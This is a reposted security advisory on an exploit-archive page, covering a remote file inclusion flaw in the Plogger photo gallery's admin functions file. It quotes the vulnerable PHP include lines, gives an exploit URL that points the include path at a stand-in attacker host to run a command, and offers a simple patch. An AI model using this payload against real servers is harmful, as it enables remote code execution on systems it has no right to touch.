Advertisement






Plogger Photo Gallery Remote File Include

CVE Category Price Severity
CVE-2007-2239 CWE-98 $N/A High
Author Risk Exploitation Type Date
the_Edit0r High Remote 2006-01-02
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H 0.78244 0.97277

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2005120053

Below is a copy:

Security .Net Information (Infobugs) Advisore:

Plogger include bug in /admin/plog-admin-functions.php

VULN:
 
================ Codigo Vuln===============
<?php
 
require_once($config['basedir'] . "/plog-functions.php"); <--- VULN
require_once($config['basedir'] . "/lib/exifer1_4/exif.php"); <--- VULN
function add_picture($album_id,$tmpname,$filename,$caption) {
global $TABLE_PREFIX;
global $config;
================ Codigo Vuln===============

 
Exploit:



http://www.server.com/PATH/admin/plog-admin-functions.php?config[basedir]=http://www.hack.com/evil_file.php?cmd=uptime 



Fix By ARIEL ( [email protected] Esta direcci&amp;oacuten de correo electr&amp;oacutenico esta protegida contra el spam, necesitas activar javascript )



<?php
if ($_REQUEST['config'] || ($_REQUEST['basedir']))
die('nou nou nouuuu');
require_once($config['basedir'] . "/plog-functions.php");
require_once($config['basedir'] . "/lib/exifer1_4/exif.php");
function add_picture($album_id,$tmpname,$filename,$caption) {
global $TABLE_PREFIX;
global $config;
===================
Greetz:
ARIEL ( [email protected] Esta direcci&amp;oacuten de correo electr oacutenico esta protegida contra el spam, necesitas activar javascript ) for Fix, ATY SPEED ROOT Mr_Nice and friends of Infobugs =)
 
 
Original Advisore in Spanish:
http://freeconnects.webcindario.com/index.php?option=com_content&amp;task=view&amp;id=41&amp;Itemid=1 
 
Security .Net Information
FumetasHouse Corporation
int21h From Argentina =) 

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum